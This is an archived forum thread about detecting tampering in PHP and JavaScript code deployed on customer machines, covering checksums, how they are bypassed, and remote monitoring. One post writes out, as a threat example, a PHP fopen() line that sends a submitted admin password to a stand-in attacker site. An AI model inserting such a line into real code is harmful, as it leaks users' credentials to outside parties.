473,729 Members | 2,132 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

Is there a way to verify integrity of php/javascript code

Han
Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

Sep 23 '05 #1
23 5087

Han wrote:
Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han


the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

hope this helps.

iwp

Sep 23 '05 #2
>Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.
If you put sensitive info that you don't want end-users to see on
end-user machines, they don't have to "steal" it, you already gave
it to them.

And why would they need access to the console if they can log in
remotely?
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?
Anyone modifying the code can simply see what the hash is on
unmodified code and then modify the code to always send that. Or
they can modify the code to do the hash on an unmodified copy which
is never run.
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?


You can't. Remember, if the user can view your code on a display,
then someone can aim a webcam at that display and send it anywhere.

You could try using a tamper-proof smart card, but I don't know of any
of those with a graphical display or with networking capabilities.

Gordon L. Burditt
Sep 23 '05 #3
>> Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han


the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.


Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt
Sep 23 '05 #4
Han
A simpler attack would be to disable that check.

I guess the solution has to be outside of php. I cannot figure out a
solution though.

-Han

Gordon Burditt wrote:
Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han


the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.


Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt


Sep 23 '05 #5
Han
We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.

We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.

Thanks
-Han

Sep 23 '05 #6
Han wrote:
We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).


Don't store passwords. Problem solved.
Cheers,
NIcholas Sherlock
Sep 23 '05 #7
>We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).
Does the admin of the server on which the PHP code is running want
the check to work, or does he want to subvert it?

If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?
Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.
If the *SERVER ADMIN* is trying to compromise your code (e.g. it's
some kind of copy protection or licensing check), you don't have
much chance of stopping it. The same applies to a hacker who manages
to get root on the box and who spends enough time to understand the
problem. Pre-scripted attacks are much easier to stop. Another approach
is to put a key part of the operation of the system on a server *YOU*
control, so, for instance, if an activation key gets posted on the
Internet and is widely abused, you can deactivate it.

Doing something like opening the file $_SERVER['PHP_SELF'], computing
a checksum of it, and checking it against a known value is easily
defeated by a human who understands the code, but it will trip up
a virus that simply sticks logging code at the beginning of the
script to leak passwords to a remote (evil) system, at least until
your technique becomes so common that it's worth writing an attack
to defeat it. Oh, yes, you probably have to checksum all of the
file EXCEPT the part containing the 'correct answer', as computing
the checksum of the script when it already contains the answer you're
trying to compute is intentionally difficult, so you might checksum
all but the first line, and the first line is:
<?php $md5sum='a37862 648cde798779873 83992';

It would work better if you can introduce a system that can be
considered secure. For example, you don't just check the checksum
of the script *in the script*, you also output it to the browser
(perhaps hidden in a HTML comment). Your customer registers his
URL where he installs the script with you, and you poll them all,
verifying the checksum. If it changes, you raise an alarm. We're
assuming that the hacker can't get your customer's server and your
monitoring system at the same time, so replacing the 'correct answer'
is harder to do. Nagios is a nice monitoring system that can run
all sorts of periodic remote checks on your network (like that your
web server is up, that your cert is not expired, and you could do
just about any check on a web page returned that you can write a
script to verify).
We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.


Tamper-proof smart cards are needed where the holder of the card wants
to cheat the system and there's enough monetary incentive for him
to use a lot of effort trying to do so. I originally thought this
was the situation you were describing, apparently I misinterpreted
what you wanted.

Gordon L. Burditt
Sep 23 '05 #8
Han
Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
to
fopen('http://www.badhackerss ite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]

Sep 23 '05 #9
Nicholas Sherlock (n_********@hot mail.com) wrote:
: Han wrote:
: > We are not trying to hide sensitive data that belongs to us. The
: > sensitive info is the users' data (e.g., their passwords).

: Don't store passwords. Problem solved.
To be a little clearer, do not store unencrypted passwords, only store the
crypt or md5 checksum of a password.

Use two way encryption of important data like credit card numbers. If the
hardware is stolen then it is much harder to steal the data. If possible
require a person to enter the decrypt password for data. Either when the
system starts up so that the decrypted data is never available except
within the memory of the running computer after a bootup by an authorized
person (though the virtual memory paging file must be considered as well).
Or decrypt the data just as needed, where each set of data has a password
specific to what ever person is authorized to access that data.

Store important data on a "more secure" server (in this case - yours), and
access it through a VPN that requires a manual password.

Combine the two, so that (for example) a cronjob reads a hard coded
password but only via a secure (i.e. encrypted) link to a another computer
at a different location.

However, if any person has access, either physical or remote login with
any privileges (intended or not) then the program and the data can never
be completely protected.

One very common strategy to solve this is to make the system and data
available only to people that are trusted. "trusted" actually means back
ground checks (criminal record checks etc), signed contracts, security
clearances, two key signins, etc etc. continual review of security
procedures and policies. (That is all the stuff that allow large
companies to charge outrageous prices.)

Another strategy used in some settings - the server hardware does not
belong to the customer. The seller (you in your example) still owns the
hardware. The customer has no privileged access, but does have physical
control of the box. You login remotely to do upgrades etc, or other
maintenance. They might control your remote access by physically
disconnecting your connection to the box, and possibly monitoring your
connection when you work on it (you'll need to use a challenge/response
login if they monitor your access).

--

This programmer available for rent.
Sep 23 '05 #10

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

1
1241
by: TechWitch | last post by:
I posted this to the ms sql clustering news group, but I thought I'd post it here just in case someone here knew the answser. This problem has had me baffled for 5 months, and I'm not seeing any support articles from Microsoft on it, yet. Anyone here got a clue? About 5 months ago, I posted a query to this group after experiencing failures with my database maintenance plans (during the verify phase) that run on SQL Clusters on Windows...
4
15836
by: maricel | last post by:
I have the following base table structure - DDL: CREATE TABLE "ADMINISTRATOR"."T1" ( "C1" INTEGER NOT NULL ) IN "TEST_TS" ; ALTER TABLE "ADMINISTRATOR"."T1" ADD PRIMARY KEY
2
2603
by: Jim Adams | last post by:
I'm creating an XML license file and would like to add a digital signature entry to the file. My VB.Net app will use this signature to verify the file's integrity. Can anyone point to some sample code that can do this? Thanks, Jim
80
7879
by: Andrew R | last post by:
Hi I'm creating a series of forms, each with with around 15-20 text boxes. The text boxes will show data from tables, but are unbound to make them more flexible. I want the form to be used for both adding new data and modifying existing data. I have created a save button on the form. When the user clicks the save button, the code checks to see if there
16
5664
by: Brian Tkatch | last post by:
Is there a way to check the order in which SET INTEGRITY needs to be applied? This would be for a script with a dynamic list of TABLEs. B.
2
5673
by: SM | last post by:
Hello, I've created this 'wonderful' function the embeds a youtube video in a specified div section using the Javascript DOM. Everything works OK... until I realize how bad the logical programming was. See, if you look at the function below, everytime i passed the youtube video id, i create the object over and over and over .... again and again and again..... you get the picture. I could erase the object using and created again, but...
0
1916
by: WTH | last post by:
I ask because I've got a windows service I've written that manages failover and replication for our products (or even 3rd party applications) and it worked great right until I tested it (for ease of testing purposes) with Internet Explorer (iexplore.exe) - I was testing handling argument list buffer overflows. What I found with iexplore.exe is that because my windows service is running with high privileges (due to running under the local...
5
7726
by: jerrydigital | last post by:
Hi, I have a registration form that uses the javascript validation code I have posted below. I am trying to verify that the user enters a birthdate in the format 01/11/1999 Anyone know how I can incorporate a date format code into my existing code? Thanks for any help - Jerry <script type="text/javascript"> <!--
6
3553
Frinavale
by: Frinavale | last post by:
Apparently I have a lot of questions today regarding JavaScript security. I've implemented a JavaScript Object that intercepts page submits (postbacks) and then displays a UI prompting the user to confirm(yes)/deny(no)/cancel(close UI/cancel submit) their action. There may be additional JavaScript methods to execute before displaying the UI and may be additional JavaScript methods to execute upon closing the UI. I'm thinking about...
0
8930
marktang
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...
0
9428
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
0
9291
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth. The Art of Business Website Design Your website is...
0
9158
tracyyun
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
0
8163
agi2029
by: agi2029 | last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own.... Now, this would greatly impact the work of software developers. The idea...
1
6722
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules. He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms. Adolph will...
0
6026
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...
1
3244
by: 6302768590 | last post by:
Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
3
2171
bsmnconsultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.